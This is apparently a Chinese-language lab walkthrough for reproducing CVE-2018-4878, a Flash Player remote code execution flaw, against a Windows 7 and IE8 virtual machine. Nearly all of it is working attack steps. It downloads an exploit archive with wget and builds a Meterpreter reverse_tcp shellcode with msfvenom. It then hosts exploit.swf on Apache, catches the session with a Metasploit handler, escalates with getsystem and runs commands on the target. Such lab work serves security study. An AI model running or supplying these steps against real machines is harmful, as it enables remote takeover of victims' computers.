漏洞名: CVE-2018-4878
危害: 造成远程命令执行
影响范围: Flash Player28.0.0.137及以前的所有版本
准备工作:
kail: 192.168.91.146
win7,Flash Player28.0.0.137,IE8
这是一位前辈的Player:
链接:https://pan.baidu.com/s/1dotCoCx0AX8sgUaOqFT9vw 密码:0li0
事先下好exp:
wget https://raw.githubusercontent.com/backlion/demo/master/CVE-2018-4878.rar
解压:
rar x CVE-2018-4878.rar
如果出现找不到命令的情况,执行:
wget https://www.rarlab.com/rar/rarlinux-x64-5.5.0.tar.gz tar -zxvf rarlinux-x64-5.5.0.tar.gz cd rar make install mkdir -p /usr/local/bin mkdir -p /usr/local/lib cp rar unrar /usr/local/bin cp rarfiles.lst /etc cp default.sfx /usr/local/lib
使用msfvenom
msfvenom -p windows/meterpreter/reverse_tcp LHOST=主机ip LPORT=6666 -f python > /root/shellcode.txt
生成一个python类型的shellcode
打开 /root/shellcode.txt
将生成的shellcode.txt里面的内容复制,并覆盖cve-2018-4878.py里面的shellcode
并将里面的stageless = True改为False,打开文件的地址改为自己的储存地址:
然后运行python文件,运行完之后生成两个文件:
将exploit.swf和index.html复制到/var/www/html下,启动apache服务:
service apache2 start
开始复现:
打开msfconsole:
输入以下命令:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.91.146
set lport 6666
exploit
现在打开win7,访问我们的网页,192.168.91.146/index.html
kail:暂无反应,估计是因为win7虚拟机ie未响应,唉,毕竟是这么老的版本了
之后配置了一下,kail的ip改为:192.168.91.150
成功穿透,得到session;
使用shell
命令获取目标主机的cmd:
getsystem
:可以获取管理员权限
之后就可以随意输入命令啦
打开计算器并截图:
execute -f calc.exe
screenshot